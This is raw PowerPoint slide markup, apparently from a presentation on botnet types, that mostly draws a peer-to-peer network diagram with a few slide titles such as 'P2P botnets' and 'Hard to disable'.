          <p:nvPicPr>
            <p:cNvPr id="15" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11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5364226" y="2924175"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 12"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1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7164451" y="3429000"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2555875" y="3213100"/>
              <a:ext cx="2016125" cy="2374900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="71500" y="1368425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="576326" y="2160651"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="360425" y="431800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="720725"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="1368425" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="863600" y="144525"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="792226" y="503300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1584325" y="1511300"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="215900" y="1079500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511300" y="1655699"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="1728851" y="2087626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1152525" y="2374900"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2016125" h="2374900">
                  <a:moveTo>
                    <a:pt x="1944751" y="215900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2016125" y="15113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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4716526" y="3206750"/>
              <a:ext cx="503555" cy="12700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="503554" h="12700">
                  <a:moveTo>
                    <a:pt x="0" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="503174" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50317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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4716526" y="3429000"/>
              <a:ext cx="1008380" cy="2447925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1008379" h="2447925">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1007999" y="1079500"/>
                  </a:lnTo>
                </a:path>
                <a:path w="1008379" h="2447925">
                  <a:moveTo>
                    <a:pt x="0" y="1944751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792099" y="24479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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6005576" y="5157723"/>
              <a:ext cx="12700" cy="576580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12700" h="576579">
                  <a:moveTo>
                    <a:pt x="0" y="576326"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12700" y="576326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5763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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3492500" y="3357626"/>
              <a:ext cx="3672204" cy="1440180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3672204" h="1440179">
                  <a:moveTo>
                    <a:pt x="2592451" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3527425" y="287274"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3672204" h="1440179">
                  <a:moveTo>
                    <a:pt x="2951226" y="1150874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3671951" y="576199"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3672204" h="1440179">
                  <a:moveTo>
                    <a:pt x="2087626" y="287274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1224026" y="1439799"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3672204" h="1440179">
                  <a:moveTo>
                    <a:pt x="0" y="215900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2159000" y="13667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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2555875" y="3644900"/>
              <a:ext cx="1511300" cy="1729105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1511300" h="1729104">
                  <a:moveTo>
                    <a:pt x="360425" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="288925"/>
                  </a:lnTo>
                </a:path>
                <a:path w="1511300" h="1729104">
                  <a:moveTo>
                    <a:pt x="215900" y="647700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511300" y="1223899"/>
                  </a:lnTo>
                </a:path>
                <a:path w="1511300" h="1729104">
                  <a:moveTo>
                    <a:pt x="71500" y="936625"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="576326" y="1728851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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5992876" y="5157723"/>
              <a:ext cx="38100" cy="576580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="38100" h="576579">
                  <a:moveTo>
                    <a:pt x="0" y="576326"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38100" y="57632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76326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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084951" y="3357626"/>
              <a:ext cx="1079500" cy="1151255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1079500" h="1151254">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="934974" y="287274"/>
                  </a:lnTo>
                </a:path>
                <a:path w="1079500" h="1151254">
                  <a:moveTo>
                    <a:pt x="358775" y="1150874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1079500" y="5761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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4716526" y="3194050"/>
              <a:ext cx="503555" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="503554" h="38100">
                  <a:moveTo>
                    <a:pt x="0" y="38100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="503174" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503174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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3348100" y="3213100"/>
              <a:ext cx="2376805" cy="2663825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="1368425" y="215900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2376424" y="1295400"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="936498" y="2087626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360299" y="2374900"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="1152525" y="215900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1223899" y="1511300"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="1368425" y="2160651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160524" y="2663825"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="2232025" y="431800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1368425" y="1584325"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="0" y="503300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792099" y="1511300"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="576199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71374" y="144525"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2376804" h="2663825">
                  <a:moveTo>
                    <a:pt x="144399" y="360425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2303399" y="1511300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Types Botnets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745" y="1022350"/>
            <a:ext cx="2552700" cy="4959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P2P botnets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object 2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361315" y="1518285"/>
            <a:ext cx="7255510" cy="866140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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Hard to disable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711768" y="2009775"/>
            <a:ext cx="6768465" cy="4273550"/>
            <a:chOff x="5630" y="4265"/>
            <a:chExt cx="9076" cy="5730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5630" y="4265"/>
              <a:ext cx="9076" cy="5730"/>
              <a:chOff x="2051050" y="2708275"/>
              <a:chExt cx="5763260" cy="3638550"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="object 5"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4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71775" y="2997200"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="object 6"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6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40200" y="4724400"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="object 7"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7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96026" y="4436998"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="object 8"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8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95801" y="2708275"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="object 9"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9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51050" y="3860800"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="object 10"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10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580126" y="5661025"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="object 11"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11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364226" y="2924175"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="object 12"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12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164451" y="3429000"/>
                <a:ext cx="649287" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="object 13"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2555875" y="3213100"/>
                <a:ext cx="2016125" cy="237490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2374900">
                    <a:moveTo>
                      <a:pt x="71500" y="1368425"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="576326" y="2160651"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="360425" y="431800"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="720725"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="1368425" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="863600" y="144525"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="792226" y="503300"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1584325" y="1511300"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="215900" y="1079500"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1511300" y="1655699"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="1728851" y="2087626"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1152525" y="2374900"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2016125" h="2374900">
                    <a:moveTo>
                      <a:pt x="1944751" y="215900"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2016125" y="151130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/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="object 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4716526" y="3206750"/>
                <a:ext cx="5035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03554" h="12700">
                    <a:moveTo>
                      <a:pt x="0" y="12700"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="503174" y="12700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503174" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="object 15"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId15"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4716526" y="3429000"/>
                <a:ext cx="1008380" cy="2447925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1008379" h="2447925">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1007999" y="1079500"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1008379" h="2447925">
                    <a:moveTo>
                      <a:pt x="0" y="1944751"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="792099" y="2447925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/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="object 16"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId16"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6005576" y="5157723"/>
                <a:ext cx="12700" cy="57658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576579">
                    <a:moveTo>
                      <a:pt x="0" y="576326"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12700" y="576326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12700" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57632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p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="object 17"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId17"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3492500" y="3357626"/>
                <a:ext cx="3672204" cy="1440180"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3672204" h="1440179">
                    <a:moveTo>
                      <a:pt x="2592451" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3527425" y="287274"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="3672204" h="1440179">
                    <a:moveTo>
                      <a:pt x="2951226" y="1150874"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3671951" y="576199"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="3672204" h="1440179">
                    <a:moveTo>
                      <a:pt x="2087626" y="287274"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1224026" y="1439799"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="3672204" h="1440179">
                    <a:moveTo>
                      <a:pt x="0" y="215900"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2159000" y="1366774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/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="object 18"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId18"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2555875" y="3644900"/>
                <a:ext cx="576580" cy="172910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1729104">
                    <a:moveTo>
                      <a:pt x="360425" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="288925"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="576580" h="1729104">
                    <a:moveTo>
                      <a:pt x="71500" y="936625"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="576326" y="1728851"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="object 19"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId19"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5992876" y="5157723"/>
                <a:ext cx="38100" cy="57658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576579">
                    <a:moveTo>
                      <a:pt x="0" y="576326"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38100" y="576326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="576326"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="object 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId20"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6084951" y="3357626"/>
                <a:ext cx="1079500" cy="1151255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1079500" h="1151254">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="934974" y="287274"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1079500" h="1151254">
                    <a:moveTo>
                      <a:pt x="358775" y="1150874"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1079500" y="576199"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="object 21"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId21"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4716526" y="3194050"/>
                <a:ext cx="50355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503554" h="38100">
                    <a:moveTo>
                      <a:pt x="0" y="38100"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="503174" y="38100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503174" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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FF9900"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="object 22"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId22"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2771775" y="3213100"/>
                <a:ext cx="2952750" cy="2663825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2663825">
                    <a:moveTo>
                      <a:pt x="1944751" y="215900"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2952750" y="1295400"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="0" y="1079500"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1295400" y="1655699"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="1512951" y="2087626"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="936625" y="2374900"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="1728851" y="215900"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1800225" y="1511300"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="1944751" y="2160651"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2736850" y="2663825"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="2808351" y="431800"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1944751" y="1584325"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="576326" y="503300"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1368425" y="1511300"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="1152525" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="647700" y="144525"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="2952750" h="2663825">
                    <a:moveTo>
                      <a:pt x="720725" y="360425"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2879725" y="1511300"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:ln>
